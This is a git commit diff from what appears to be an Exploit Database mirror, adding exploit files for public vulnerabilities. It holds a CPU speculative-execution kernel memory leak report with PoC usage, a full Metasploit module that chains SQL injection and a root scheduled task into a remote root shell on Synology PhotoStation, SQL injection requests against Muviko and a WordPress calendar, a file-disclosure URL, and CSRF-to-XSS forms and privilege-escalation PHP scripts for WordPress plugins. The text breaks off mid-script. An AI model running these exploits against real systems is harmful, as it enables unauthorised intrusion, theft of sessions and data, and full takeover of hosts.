DB: 2018-01-11

28 changes to exploits/shellcodes Multiple CPUs - Information Leak Using Speculative Execution Microsoft Edge Chakra JIT - 'Lowerer::LowerSetConcatStrMultiItem' Missing Integer Overflow Check Jungo Windriver 12.5.1 - Privilege Escalation DiskBoss Enterprise 8.8.16 - Buffer Overflow HPE iMC - dbman RestoreDBase Unauthenticated Remote Command Execution (Metasploit) HPE iMC - dbman RestartDB Unauthenticated Remote Command Execution (Metasploit) Synology Photostation 6.7.2-3429 - Remote Code Execution (Metasploit) Worpress Plugin Service Finder Booking < 3.2 - Local File Disclosure Muviko 1.1 - SQL Injection WordPress Plugin Events Calendar - 'event_id' SQL Injection WordPress Plugin Social Media Widget by Acurax 3.2.5 - Cross-Site Request Forgery WordPress Plugin CMS Tree Page View 1.4 - Cross-Site Request Forgery / Privilege Escalation WordPress Plugin Admin Menu Tree Page View 2.6.9 - Cross-Site Request Forgery / Privilege Escalation WordPress Plugin WordPress Download Manager 2.9.60 - Cross-Site Request Forgery Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting BSD/x86 - Bind TCP Shell (31337/TCP) + setuid(0) Shellcode (94 bytes) BSD/x86 - setuid(0) + Bind TCP Shell (31337/TCP) Shellcode (94 bytes) BSD/x86 - execve /bin/cat /etc/master.passwd | mail [email] Shellcode (92 bytes) BSD/x86 - Reverse TCP Shell (192.168.1.69:6969/TCP) Shellcode (129 bytes) BSD/x86 - execve(/bin/cat /etc/master.passwd) | mail root@localhost Shellcode (92 bytes) FreeBSD/x86 - Reverse TCP Shell (192.168.1.69:6969/TCP) Shellcode (129 bytes) BSD/x86 - Bind TCP Shell (31337/TCP) + Fork Shellcode (111 bytes) FreeBSD/x86 - Bind TCP Shell (31337/TCP) + Fork Shellcode (111 bytes) Linux/x86 - execve /bin/dash Shellcode (30 bytes) Alpha - /bin/sh Shellcode (80 bytes) Alpha - execve() Shellcode (112 bytes) Alpha - setuid() Shellcode (156 bytes) BSD/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh_) Shellcode (36 bytes) Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes)
2018-01-11 05:02:24 +00:00 · 2018-01-11 05:02:24 +00:00 · a7ddd8282b
commit a7ddd8282b
parent ffa8e63e25
26 changed files with 2255 additions and 13 deletions
--- a/exploits/hardware/dos/43490.txt
+++ b/exploits/hardware/dos/43490.txt
@ -0,0 +1,146 @@
 == INTRODUCTION ==
 This is a bug report about a CPU security issue that affects
 processors by Intel, AMD and (to some extent) ARM.
 I have written a PoC for this issue that, when executed in userspace
 on an Intel Xeon CPU E5-1650 v3 machine with a modern Linux kernel,
 can leak around 2000 bytes per second from Linux kernel memory after a
 ~4-second startup, in a 4GiB address space window, with the ability to
 read from random offsets in that window. The same thing also works on
 an AMD PRO A8-9600 R7 machine, although a bit less reliably and slower.
 On the Intel CPU, I also have preliminary results that suggest that it
 may be possible to leak host memory (which would include memory owned
 by other guests) from inside a KVM guest.
 The attack doesn't seem to work as well on ARM - perhaps because ARM
 CPUs don't perform as much speculative execution because of a
 different performance-energy-tradeoff or so?
 All PoCs are written against specific processors and will likely
 require at least some adjustments before they can run in other
 environments, e.g. because of hardcoded timing tresholds.
 ############################################################
 On the following Intel CPUs (the only ones tested so far), we managed
 to leak information using another variant of this issue ("variant 3").
 So far, we have not managed to leak information this way on AMD or ARM CPUs.
 - Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz (in a workstation)
 - Intel(R) Core(TM) i7-6600U CPU @ 2.60GHz (in a laptop)
 Apparently, on Intel CPUs, loads from kernel mappings in ring 3 during
 speculative execution have something like the following behavior:
 - If the address is not mapped (perhaps also under other
   conditions?), instructions that depend on the load are not executed.
 - If the address is mapped, but not sufficiently cached, the load loads zeroes.
   Instructions that depend on the load are executed.
   Perhaps Intel decided that in case of a sufficiently high-latency load,
   it makes sense to speculate ahead with a dummy value to get a chance to
   prefetch cachelines for dependent loads, or something like that?
 - If the address is sufficiently cached, the load loads the data stored at the
   given address, without respecting the privilege level.
   Instructions that depend on the load are executed.
   This is the vulnerable case.
 I have attached a PoC that works on both tested Intel systems, named
 intel_kernel_read_poc.tar. Usage:
 As root, determine where the core_pattern is in the kernel:
 =====
 # grep core_pattern /proc/kallsyms
 ffffffff81e8aea0 D core_pattern
 =====
 Then, as a normal user, unpack the PoC and use it to leak the
 core_pattern (and potentially other cached things around it) from
 kernel memory, using the pointer from the previous step:
 =====
 $ cat /proc/sys/kernel/core_pattern
 /cores/%E.%p.%s.%t
 $ ./compile.sh && time ./poc_test ffffffff81e8aea0 4096
 ffffffff81e8aea0  2f 63 6f 72 65 73 2f 25 45 2e 25 70 2e 25 73 2e
 |/cores/%E.%p.%s.|
 ffffffff81e8aeb0  25 74 00 61 70 70 6f 72 74 20 25 70 20 25 73 20
 |%t.apport %p %s |
 ffffffff81e8aec0  25 63 20 25 50 00 00 00 00 00 00 00 00 00 00 00  |%c
 %P...........|
 [ zeroes ]
 ffffffff81e8af20  c0 a4 e8 81 ff ff ff ff c0 af e8 81 ff ff ff ff
 |................|
 ffffffff81e8af30  20 8e f0 81 ff ff ff ff 75 d9 cd 81 ff ff ff ff  |
 .......u.......|
 [ zeroes ]
 ffffffff81e8bb60  65 5b cf 81 ff ff ff ff 00 00 00 00 00 00 00 00
 |e[..............|
 ffffffff81e8bb70  00 00 00 00 6d 41 00 00 00 00 00 00 00 00 00 00
 |....mA..........|
 [ zeroes ]
 real 0m13.726s
 user 0m9.820s
 sys 0m3.908s
 =====
 As you can see, the core_pattern, part of the previous core_pattern (behind the
 first nullbyte) and a few kernel pointers were leaked.
 To confirm whether other leaked kernel data was leaked correctly, use gdb as
 root to read kernel memory:
 =====
 # gdb /bin/sleep /proc/kcore
 [...]
 (gdb) x/4gx 0xffffffff81e8af20
 0xffffffff81e8af20: 0xffffffff81e8a4c0 0xffffffff81e8afc0
 0xffffffff81e8af30: 0xffffffff81f08e20 0xffffffff81cdd975
 (gdb) x/4gx 0xffffffff81e8bb60
 0xffffffff81e8bb60: 0xffffffff81cf5b65 0x0000000000000000
 0xffffffff81e8bb70: 0x0000416d00000000 0x0000000000000000
 =====
 Note that the PoC will report uncached bytes as zeroes.
 To Intel:
 Please tell me if you have trouble reproducing this issue.
 Given how different my two test machines are, I would be surprised if this
 didn't just work out of the box on other CPUs from the same generation.
 This PoC doesn't have hardcoded timings or anything like that.
 We have not yet tested whether this still works after a TLB flush.
 Regarding possible mitigations:
 A short while ago, Daniel Gruss presented KAISER:
 https://gruss.cc/files/kaiser.pdf
 https://lkml.org/lkml/2017/5/4/220 (cached:
 https://webcache.googleusercontent.com/search?q=cache:Vys_INYdkOMJ:https://lkml.org/lkml/2017/5/4/220+&cd=1&hl=en&ct=clnk&gl=ch
 )
 https://github.com/IAIK/KAISER
 Basically, the issue that KAISER tries to mitigate is that on Intel
 CPUs, the timing of a pagefault reveals whether the address is
 unmapped or mapped as kernel-only (because for an unmapped address, a
 pagetable walk has to occur while for a mapped address, the TLB can be
 used). KAISER duplicates the top-level pagetables of all processes and
 switches them on kernel entry and exit. The kernel's top-level
 pagetable looks as before. In the top-level pagetable used while
 executing userspace code, most entries that are only used by the
 kernel are zeroed out, except for the kernel text and stack that are
 necessary to execute the syscall/exception entry code that has to
 switch back the pagetable.
 I suspect that this approach might also be usable for mitigating
 variant 3, but I don't know how much TLB flushing / data cache
 flushing would be necessary to make it work.
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43490.zip
--- a/exploits/php/webapps/43474.rb
+++ b/exploits/php/webapps/43474.rb
@ -0,0 +1,365 @@
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::FileDropper
  include Msf::Exploit::Remote::HttpClient
  def initialize(info={})
    super(update_info(info,
      'Name'           => "Synology PhotoStation Multiple Vulnerabilities",
      'Description'    => %q{
        This module exploits multiple vulnerabilities in Synology PhotoStation.
        When combined these issues can be leveraged to gain a remote root shell.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'James Bercegay',
        ],
      'References'     =>
        [
          [ 'URL', 'http://gulftech.org/' ]
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true
        },
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Targets'        => [ ['Automatic', {}] ],
      'DisclosureDate' => '2018-01-08',
      'DefaultTarget'  => 0))
      register_options(
      [
        OptString.new('DSMPORT',   [ true,  "The default DSM port", '5000']),
      ])
  end
  def check
    res = send_request_cgi(
      {
        'uri'       =>  '/photo/include/blog/label.php',
        'method'    => 'POST',
        'vars_post' =>
          {
            'action' =>'get_article_label',
            'article_id' => "1; SELECT user; -- "
          },
      })
    if res and res.body =~ /PhotoStation/
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end
  end
  def exploit
  rnum = rand(1000)
  rstr = Rex::Text.rand_text_alpha(10)  
  uuid = rnum # User ID
  upwd = rstr # User Password
  uusr = rstr # User name
  vol1 = '/volume1'
  audb = '/usr/syno/etc/private/session/current.users'
 ###########################################################################
 # STEP 00: Force PhotoStation to NOT use DSM for the authentication system
 ###########################################################################
    print_status("Switching authentication system to PhotoStation via SQL Injection")
    res = send_request_cgi(
      {
        'uri'       =>  '/photo/include/blog/label.php',
        'method'    => 'POST',
        'vars_post' =>
          {
            'action' =>'get_article_label',
            'article_id' => "1; UPDATE photo_config SET config_value=0 WHERE config_key='account_system'; -- "
          },
      })
 ###########################################################################
 # STEP 01: Create an admin user
 ###########################################################################
    print_status("Creating admin user: #{uusr} => #{upwd}")
    # Password hash
    umd5 = Rex::Text.md5(upwd)
    res = send_request_cgi(
      {
        'uri'       =>  '/photo/include/blog/label.php',
        'method'    => 'POST',
        'vars_post' =>
          {
            'action' =>'get_article_label',
            'article_id' => "1; INSERT INTO photo_user (userid, username, password, admin) VALUES (#{uuid}, '#{uusr}', '#{umd5}', TRUE); -- "
          },
      })
 ###########################################################################
 # STEP 02: Authenticate and store session identifier
 ###########################################################################
    print_status("Authenticating as admin user: #{uusr}")
    res = send_request_cgi(
      {
        'uri'       =>  '/photo/webapi/auth.php',
        'method'    => 'POST',
        'vars_post' =>
          {
            'api' =>'SYNO.PhotoStation.Auth',
            'method' => 'login',
            'version' =>'1',
            'username' => uusr,
            'password' => upwd,
            'enable_syno_token' => 'TRUE',
          },
      })
    if not res or not res.headers or not res.headers['Set-Cookie']
      print_error("Unable to retrieve session identifier! Aborting ...")
      return
    end
  uckv =  res.headers['Set-Cookie']
  psid = /PHPSESSID=([a-z0-9]+);/.match(uckv)[1]
  print_status("Got PHP Session ID: #{psid}")
 ###########################################################################
 # STEP 03: Delete any existing path names used from the database
 ###########################################################################
  print_status("Making sure there are no duplicate path index conflicts ...")
    res = send_request_cgi(
      {
        'uri'       =>  '/photo/include/blog/label.php',
        'method'    => 'POST',
        'vars_post' =>
          {
            'action' =>'get_article_label',
            'article_id' => "1; DELETE FROM video WHERE path='#{audb}'; -- "
          },
      })
    res = send_request_cgi(
      {
        'uri'       =>  '/photo/include/blog/label.php',
        'method'    => 'POST',
        'vars_post' =>
          {
            'action' =>'get_article_label',
            'article_id' => "1; DELETE FROM video WHERE path='#{vol1}/photo///current.users'; -- "
          },
      })
 ###########################################################################
 # STEP 04: Create a record for our malicious path in the database
 ###########################################################################
  print_status("Creating video record with bad 'path' data via SQL injection")
    res = send_request_cgi(
      {
        'uri'       =>  '/photo/include/blog/label.php',
        'method'    => 'POST',
        'vars_post' =>
          {
            'action' =>'get_article_label',
            'article_id' => "1; INSERT INTO video (id, path, title, container_type) VALUES (#{rnum}, '#{audb}', '#{rstr}', '#{rstr}'); -- "
          },
      })
 ###########################################################################
 # STEP 05: Copy session database as root, to the web directory for reading
 ###########################################################################
  print_status("Making a copy of the session db as root via synophotoio")
    res = send_request_cgi(
      {
        'uri'       =>  '/photo/include/photo/album_util.php',
        'method'    => 'POST',
        'vars_post' =>
          {
            'action' =>'copy_items',
            'destination' => '2f', 
            'video_list' => rnum
          },
        'cookie' => uckv
      })
 ###########################################################################
 # STEP 06: Move the session db copy to the web root for retrieval
 ###########################################################################
  print_status("Moving session db to webroot for retrieval")
    res = send_request_cgi(
      {
        'uri'       =>  '/photo/include/file_upload.php',
        'method'    => 'POST',
        'vars_get' =>
        {
          # /../@appstore/PhotoStation/photo/
            'dir' =>'2f2e2e2f4061707073746f72652f50686f746f53746174696f6e2f70686f746f2f',
            'name' => "2f",
            'fname' => "#{rstr}",
            'sid' => "#{psid}",
            'action' => 'aviary_add',
        },
        'vars_post' =>
          {
            'url' => 'file://' + vol1 + '/photo/current.users'
          },
        'cookie' => uckv
      })
 ###########################################################################
 # STEP 07: Retrieve and read the session db
 ###########################################################################
  print_status("Attempting to read session db")
    res = send_request_cgi(
      {
        'uri'       =>  "/photo/#{rstr}.jpg",
        'method'    => 'GET'
      })
    if not res or not res.body
      print_error("Unable to retrieve session file! Aborting ...")
      return
    end
    host = /"host": "([^"]+)"/.match(res.body)[1]
    sess = /"id": "([^"]+)"/.match(res.body)[1]
    syno = /"synotoken": "([^"]+)"/.match(res.body)[1]
    print_status("Extracted admin session: #{sess} @ #{host}")
 ###########################################################################
 # STEP 08: Registering files for cleanup
 ###########################################################################
    # Uncomment for cleanup functionality
    # register_files_for_cleanup("#{vol1}/photo/current.users")
    # register_files_for_cleanup("#{vol1}/@appstore/PhotoStation/photo/#{rstr}.jpg")
 ###########################################################################
 # STEP 09: Create a task containing our payload
 ###########################################################################
  print_status("Creating privileged task to run as root")
  # Switch to DSM port from here on out
  datastore['RPORT'] = datastore['DSMPORT']
    res = send_request_cgi(
      {
        'uri'       =>  '/webapi/entry.cgi',
        'headers' => 
        { 
          'X-SYNO-TOKEN' => syno, 
          'Client-IP' => host 
        },
        'method'    => 'POST',
        'vars_post' =>
          {
            'name' => '"whatevs"',
            'owner' => '"root"',
            'enable' => 'true',
            'schedule' =>'{"date_type":0,"week_day":"0,1,2,3,4,5,6","hour":0,"minute":0,"repeat_hour":0,"repeat_min":0,"last_work_hour":0,"repeat_min_store_config":[1,5,10,15,20,30],"repeat_hour_store_config":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23]}',
            'extra' => '{"notify_enable":false,"script":"' + payload.encoded.gsub(/"/,'\"') + '","notify_mail":"","notify_if_error":false}',
            'type' => '"script"',
            'api' => 'SYNO.Core.TaskScheduler',
            'method' => 'create',
            'version' => '2',
          },
        'cookie' => "id=#{sess}"
      })
    if not res or not res.body
      print_error("Unable to create task! Aborting ...")
      return
    end
    task = /{"id"\d+)},"success":true}/.match(res.body)[1]
    print_status("Task created successfully: ID => #{task}")
 ###########################################################################
 # STEP 10: Execute the selected payload
 ###########################################################################
  print_status("Running selected task as root. Get ready for shell!")
    res = send_request_cgi(
      {
        'uri'       =>  '/webapi/entry.cgi',
        'headers' => 
        { 
          'X-SYNO-TOKEN' => syno, 
          'Client-IP' => host 
        },
        'method'    => 'POST',
        'vars_post' =>
          {
      'stop_when_error' => 'false',
      'mode' => '"sequential"',
      'compound' => '[{"api":"SYNO.Core.TaskScheduler","method":"run","version":1,"task":[' + task + ']}]',
      'api' => 'SYNO.Entry.Request',
      'method' => 'request',
      'version' => '1'
          },
        'cookie' => "id=#{sess}"
      })
 ###########################################################################
 # STEP 11: Delete payload task from scheduler
 ###########################################################################
  print_status("Deleting malicious task from task scheduler")
    res = send_request_cgi(
      {
        'uri'       =>  '/webapi/entry.cgi',
        'headers' => 
        { 
          'X-SYNO-TOKEN' => syno, 
          'Client-IP' => host 
        },
        'method'    => 'POST',
        'vars_post' =>
          {
      'stop_when_error' => 'false',
      'mode' => '"sequential"',
      'compound' => '[{"api":"SYNO.Core.TaskScheduler","method":"delete","version":1,"task":[' + task + ']}]',
      'api' => 'SYNO.Entry.Request',
      'method' => 'request',
      'version' => '1'
          },
        'cookie' => "id=#{sess}"
      })
    end
 end
--- a/exploits/php/webapps/43475.txt
+++ b/exploits/php/webapps/43475.txt
@ -0,0 +1,23 @@
 # Exploit Title: Worpress Plugin Service Finder Booking < 3.2 - Local File Disclosure
 # Google Dork: N/A
 # Date: 09/01/2018 (GMT+7)
 # Exploit Author: telahdihapus
 # Vendor Homepage: https://themeforest.net/user/aonetheme
 # Software Link: https://themeforest.net/item/service-finder-service-and-business-listing-wordpress-theme/15208793
 # Tested on: windows 10
 1. description :
 unauthenticated user can access downloads.php, and can disclosure file in server through downloads.php, using method get on 'file=', user/attacker also can disclosure wp-config, or else file
 2. POC :
 http://victim.com/wp-content/plugins/sf-booking/lib/downloads.php?file=/index.php
 3. timeline
 - jan 1, 2018 report vendor
 - jan 1, 2018 vendor send email
 - jan 1, 2018 send poc
 - jan 2, 2018 vendor contact team
 - jan 8, 2018 vendor send email about fixed issue
 4. solution :
 update to version 3.2
--- a/exploits/php/webapps/43477.txt
+++ b/exploits/php/webapps/43477.txt
@ -0,0 +1,148 @@
 # Exploit Title: Muviko 1.1 - Multiple SQL Injection
 # Exploit Author: Ahmad Mahfouz 
 # Contact: http://twitter.com/eln1x
 # Date: 09/01/2018
 # CVE: CVE-2017-17970
 # Vendor Homepage: https://www.muvikoscript.com
 # Version: 1.1
 # Tested on: Mac OS
 --------------------------------------------------------------------------------------------------------
 # SQL Injection: login.php form parameter [POST] email
 POST /login.php HTTP/1.1
 Host: localhost
 User-Agent: Mozilla/5.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Cookie: PHPSESSID=rrnaq7ssxxxxx9g6b7jd7415
 Connection: close
 Upgrade-Insecure-Requests: 1
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 45
 email=admin@dmin.com'%2b(select*from(select(sleep(20)))a)%2b'&password=admxn&login=
 --------------------------------------------------------------------------------------------------------
 # SQL Injection: load_season.php form parameter [GET] season_id
 GET /themes/flixer/ajax/load_season.php?season_id=-19'+union+all+select+1,2,3,4,5,6,7,8,9--+-&season_number=1 HTTP/1.1
 Host: localhost
 User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
 Accept: */*
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 X-Requested-With: XMLHttpRequest
 Cookie: PHPSESSID=rrnaq7ssxxxxx9g6b7jd7415
 Connection: close
 --------------------------------------------------------------------------------------------------------
 # SQL Injection get_raring.php parameter [GET] movie_id
 GET /themes/flixer/ajax/get_rating.php?movie_id=9'+AND+SLEEP(5)+AND+'AAA'='AAA HTTP/1.1
 Host: localhost
 User-Agent: Mozilla/5.0
 Accept: */*
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 X-Requested-With: XMLHttpRequest
 Cookie: PHPSESSID=rrnaq7ssxxxxx9g6b7jd7415
 Connection: close
 --------------------------------------------------------------------------------------------------------
 # SQL Injection update_rating.php parameters [GET] rating,movie_id
 GET /themes/flixer/ajax/update_rating.php?movie_id=[SQL]&rating=[SQL] HTTP/1.1
 Host: localhost
 User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
 Accept: */*
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 X-Requested-With: XMLHttpRequest
 Cookie: PHPSESSID=rrnaq7ssxxxxx9g6b7jd7415
 Connection: close
 --------------------------------------------------------------------------------------------------------
 # SQL Injection set_player_source.php parameters [GET] id
 GET /themes/flixer/ajax/set_player_source.php?id=[SQL]&is_series=1&is_embed=0 HTTP/1.1
 Host: localhost
 User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
 Accept: */*
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 X-Requested-With: XMLHttpRequest
 Cookie: PHPSESSID=rrnaq7ssxxxxx9g6b7jd7415
 Connection: close
--- a/exploits/php/webapps/43479.txt
+++ b/exploits/php/webapps/43479.txt
@ -0,0 +1,53 @@
 # Exploit Title: Wichipi Events Calendar - SQL Injection
 # Date: 09-01-2018
 # Exploit Author: Dennis Veninga
 # Contact Author: d.veninga [at] networking4all.com
 # Vendor Homepage: codecanyon.net/user/wachipi
 # Version: 1.0
 # CVE-ID: CVE-2018-5315
 Events Calendar allows you to easily add to your website a powerful
 interactive calendar to present your events.
 Found 09-01-18
 Vendor reply & fix 09-01-2018
 The Wachipi WP Events Calendar plugin 1.0 for WordPress has SQL Injection
 via the event_id parameter to event.php.
 NOTE: this plugin is NOT related to the Modern Tribe Events Calendar plugin.
 [Additional Information]
 http://
 {TARGET}/event.php?event_id=-123%20union%20all%20select%201,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
 [Vulnerability Type]
 SQL Injection
 [Vendor of Product]
 https://codecanyon.net/item/wp-events-calendar-plugin/5025660 Wachipi
 [Affected Product Code Base]
 Events Calendar - 1.0
 [Affected Component]
 events.php
 [Attack Type]
 Remote
 [Impact Code execution]
 true
 [Impact Escalation of Privileges]
 true
 [Impact Information Disclosure]
 true
 [Attack Vectors]
 To exploit, union select 29 columns.  User can use 2 or 25 for information
 gathering.
 [Discoverer]
 Dennis Veninga @ Networking4all.com
--- a/exploits/php/webapps/43484.txt
+++ b/exploits/php/webapps/43484.txt
@ -0,0 +1,74 @@
 * Exploit Title: Social Media Widget by Acurax [CSRF]
 * Discovery Date: 2017-12-12
 * Exploit Author: Panagiotis Vagenas
 * Author Link: https://twitter.com/panVagenas
 * Vendor Homepage: http://www.acurax.com/
 * Software Link: https://wordpress.org/plugins/acurax-social-media-widget
 * Version: 3.2.5
 * Tested on: WordPress 4.9.1
 * Category: WebApps, WordPress
 Description
 -----------
 Plugin implements AJAX action `acx_asmw_saveorder` which calls back the
 function `acx_asmw_saveorder_callback`. The later does not implement any
 anti-CSRF controls thus allowing a malicious actor to perform an attack
 that could update plugin specific option `social_widget_icon_array_order`.
 Vulnerable param is `$_POST['recordsArray']` and it is saved as an
 option with the name `social_widget_icon_array_order`.
 Leveraging a CSRF could lead to a Persistent XSS (see PoC). Payload will
 be served when a user with the right privileges visits plugin's settings
 page (`wp-admin/admin.php?page=Acurax-Social-Widget-Settings`).
 Vulnerable code is located in file
 `acurax-social-media-widget/function.php` line 993:
 ```
 function acx_asmw_saveorder_callback() {
     global $wpdb;
     $social_widget_icon_array_order = $_POST['recordsArray'];
     if ( current_user_can( 'manage_options' ) ) {
         $social_widget_icon_array_order = serialize(
 $social_widget_icon_array_order );
         update_option( 'social_widget_icon_array_order',
 $social_widget_icon_array_order );
         echo "<div id='acurax_notice' align='center' style='width:
 420px; font-family: arial; font-weight: normal; font-size: 22px;'>";
         echo "Social Media Icon's Order Saved";
         echo "</div><br>";
     }
     die(); // this is required to return a proper result
 }
 add_action( 'wp_ajax_acx_asmw_saveorder', 'acx_asmw_saveorder_callback' );
 ```
 PoC
 ---
 In this PoC we leverage the CSRF vulnerabilityt o perform a Persistent
 XSS attack. The payload is available in plugin's settings.
 ```
 <pre class="lang:html decode:true "><form method="post" action="http://vuln.test/wp-admin/admin-ajax.php">
     <input type="hidden" name="action" value="acx_asmw_saveorder">
     <input type="text" name="recordsArray[]" value="1'><script>alert(1);</script>">
     <button type="submit" value="Submit">Submit</button>
 </form>
 ```
 Timeline
 --------
 1. **2017-12-12**: Discovered
 2. **2017-12-12**: Tried to contact plugin's vendor through the contact
 form on their website
 3. **2017-12-12**: Vendor replied
 4. **2017-12-12**: Vendor Received Details
 5. **2018-01-02**: Patch released
--- a/exploits/php/webapps/43485.txt
+++ b/exploits/php/webapps/43485.txt
@ -0,0 +1,109 @@
 * Exploit Title: CMS Tree Page View [CSRF, Privilege Escalation]
 * Discovery Date: 2017-12-12
 * Exploit Author: Panagiotis Vagenas
 * Author Link: https://twitter.com/panVagenas
 * Vendor Homepage: http://eskapism.se/
 * Software Link: https://wordpress.org/plugins/cms-tree-page-view
 * Version: 1.4
 * Tested on: WordPress 4.8.1
 * Category: WebApps, WordPress
 Description
 -----------
 Plugin implements AJAX action `cms_tpv_add_page` which calls back the
 function `cms_tpv_add_page`. The later does not implement any anti-CSRF
 controls or security checks.
 Leveraging a CSRF attack an attacker could perform a Persistent XSS
 attack if the victim has administrative rights (see PoC).
 The AJAX action is a privileged one so it's only available for
 registered users. Even so it doesn't implement any capabilities checks
 so it's available to all users no matter the access level. This could
 allow any registered user to create arbitrary posts no matter the access
 level.
 PoC
 ---
 ### CSRF -> Persistent XSS
 In this PoC we exploit the `$_POST["page_titles"]` param to perform a
 Persistent XSS attack.
 ```
 <pre class="lang:html decode:true "><form method="post" action="http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php">
     <input type="hidden" name="action" value="cms_tpv_add_page">
     <input type="text" name="type" value="after">
     <input type="text" name="pageID" value="1">
     <input type="text" name="post_type" value="page">
     <input type="text" name="page_title" value="<script>alert(2)</script>">
     <button type="submit" value="Submit">Submit</button>
 </form>
 ```
 ### Create Arbitrary Posts
 In this PoC we use a user with subscriber access to create arbitrary
 pages. The post\_type is user defined so in the same manner we could
 create any post type.
 ```
 #!/usr/bin/env php
 <?php
 /*******************************************************************************
  * CMS Tree Page View [Privilege Escalation]
  *
  * To install deps run `composer require wordfence/exkit`.
  *
  * @author Panagiotis Vagenas <pan.vagenas@gmail.com>
  * @date 2017-08-09
  ******************************************************************************/
 require_once __DIR__ . '/vendor/autoload.php';
 use Wordfence\ExKit\Cli;
 use Wordfence\ExKit\Config;
 use Wordfence\ExKit\Endpoint;
 use Wordfence\ExKit\ExitCodes;
 use Wordfence\ExKit\WPAuthentication;
 Config::get( 'url.base', null, true, 'Enter the site URL' )
 || ExitCodes::exitWithFailedPrecondition( 'You must enter a valid URL' );
 $s = new \Wordfence\ExKit\Session( null, [], [], [ 'timeout' => 60 ] );
 Cli::writeInfo( 'Logging in as subscriber...' );
 WPAuthentication::logInAsUserRole( $s,
 WPAuthentication::USER_ROLE_SUBSCRIBER );
 Cli::writeInfo( 'Sending payload...' );
 $postData = [
     'action'      => 'cms_tpv_add_page',
     'type'        => 'after',
     'pageID'      => '1',
     'post_type'   => 'page',
     'page_title' => date('Y-m-d H:i:s'),
 ];
 $r = $s->post( Endpoint::adminAjaxURL(), [], $postData);
 if(!$r->success || $r->body == '0'){
     ExitCodes::exitWithFailed('Failed to retrieve a valid response');
 }
 ExitCodes::exitWithSuccess('Exploitation successful');
 ```
 Timeline
 --------
 1. **2017-12-12**: Discovered
 2. **2017-12-23**: Vendor notified by email
 3. **2018-01-06**: Patch released
--- a/exploits/php/webapps/43486.txt
+++ b/exploits/php/webapps/43486.txt
@ -0,0 +1,117 @@
 * Exploit Title: Admin Menu Tree Page View [CSRF, Privilege Escalation]
 * Discovery Date: 2017-12-12
 * Exploit Author: Panagiotis Vagenas
 * Author Link: https://twitter.com/panVagenas
 * Vendor Homepage: http://eskapism.se/
 * Software Link: https://wordpress.org/plugins/admin-menu-tree-page-view
 * Version: 2.6.9
 * Tested on: WordPress 4.9.1
 * Category: WebApps, WordPress
 Description
 -----------
 Plugin implements AJAX action `admin_menu_tree_page_view_add_page` which
 calls back the function `admin_menu_tree_page_view_add_page`. The later
 does not implement any anti-CSRF controls or security checks.
 Leveraging a CSRF attack an attacker could perform a Persistent XSS
 attack if the victim has administrative rights (see PoC).
 The AJAX action is a privileged one so it's only available for
 registered users. Even so it doesn't implement any capabilities checks
 so it's available to all users no matter the access level. This could
 allow any registered user to create arbitrary posts no matter the access
 level.
 PoC
 ---
 ### CSRF -> Persistent XSS
 In this PoC we exploit the `$_POST["page_titles"]` param to perform a
 Persistent XSS attack.
 ```
 <pre class="lang:html decode:true "><form method="post" action="http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php">
     <input type="hidden" name="action" value="admin_menu_tree_page_view_add_page">
     <input type="text" name="type" value="after">
     <input type="text" name="pageID" value="1">
     <input type="text" name="post_type" value="page">
     <input type="text" name="page_titles[]" value="<script>alert(1)</script>">
     <input type="text" name="post_status" value="publish">
     <button type="submit" value="Submit">Submit</button>
 </form>
 ```
 ### Create Arbitrary Posts
 In this PoC we use a user with subscriber access to create arbitrary
 pages. The post\_type is user defined so in the same manner we could
 create any post type.
 ```
 #!/usr/bin/env php
 <?php
 /*******************************************************************************
  * Admin Menu Tree Page View [Privilege Escalation]
  *
  * To install deps run `composer require wordfence/exkit`.
  *
  * @author Panagiotis Vagenas <pan.vagenas@gmail.com>
  * @date 2017-08-09
  ******************************************************************************/
 require_once __DIR__ . '/vendor/autoload.php';
 use Wordfence\ExKit\Cli;
 use Wordfence\ExKit\Config;
 use Wordfence\ExKit\Endpoint;
 use Wordfence\ExKit\ExitCodes;
 use Wordfence\ExKit\WPAuthentication;
 Config::get( 'url.base', null, true, 'Enter the site URL' )
 || ExitCodes::exitWithFailedPrecondition( 'You must enter a valid URL' );
 $s = new \Wordfence\ExKit\Session( null, [], [], [ 'timeout' => 60 ] );
 $s->XDebugOn();
 Cli::writeInfo( 'Logging in as subscriber...' );
 WPAuthentication::logInAsUserRole( $s,
 WPAuthentication::USER_ROLE_SUBSCRIBER );
 Cli::writeInfo( 'Sending payload...' );
 $postData = [
     'action'      => 'admin_menu_tree_page_view_add_page',
     'type'        => 'after',
     'pageID'      => '1',
     'post_type'   => 'page',
     'page_titles' => [ '<script>alert(1)</script>' ],
     'post_status' => 'publish',
 ];
 $r = $s->post( Endpoint::adminAjaxURL(), [], $postData);
